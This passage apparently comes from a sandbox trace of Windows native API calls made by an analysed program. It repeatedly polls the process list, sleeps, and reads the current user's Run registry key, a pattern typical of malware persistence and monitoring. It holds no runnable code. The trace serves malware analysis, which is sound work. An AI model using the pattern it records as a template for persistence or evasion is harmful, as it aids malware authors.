(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.592] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.594] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.594] NtClose (Handle=0x274) returned 0x0 [0182.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.607] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.609] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.609] NtClose (Handle=0x274) returned 0x0 [0182.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0184.522] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0184.523] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0184.523] NtClose (Handle=0x274) returned 0x0 [0184.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0184.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0184.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0184.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0184.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0184.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0184.572] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0184.575] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0184.575] NtClose (Handle=0x274) returned 0x0 [0184.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0184.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0184.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0184.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0184.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0184.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0184.880] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0184.882] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0184.882] NtClose (Handle=0x274) returned 0x0 [0184.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0184.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0184.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0184.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0184.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0184.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0184.959] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0184.960] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0184.960] NtClose (Handle=0x274) returned 0x0 [0184.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0184.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0184.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0184.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0184.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0184.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0184.975] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.024] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.024] NtClose (Handle=0x274) returned 0x0 [0185.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0185.036] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.037] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.038] NtClose (Handle=0x274) returned 0x0 [0185.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0185.079] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.080] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.080] NtClose (Handle=0x274) returned 0x0 [0185.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0185.099] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.100] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.100] NtClose (Handle=0x274) returned 0x0 [0185.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0185.141] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.142] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.142] NtClose (Handle=0x274) returned 0x0 [0185.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0185.164] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.165] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.165] NtClose (Handle=0x274) returned 0x0 [0185.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0185.247] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0185.249] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0185.249] NtClose (Handle=0x274) returned 0x0 [0185.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0185.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0185.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0185.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0185.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0185.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 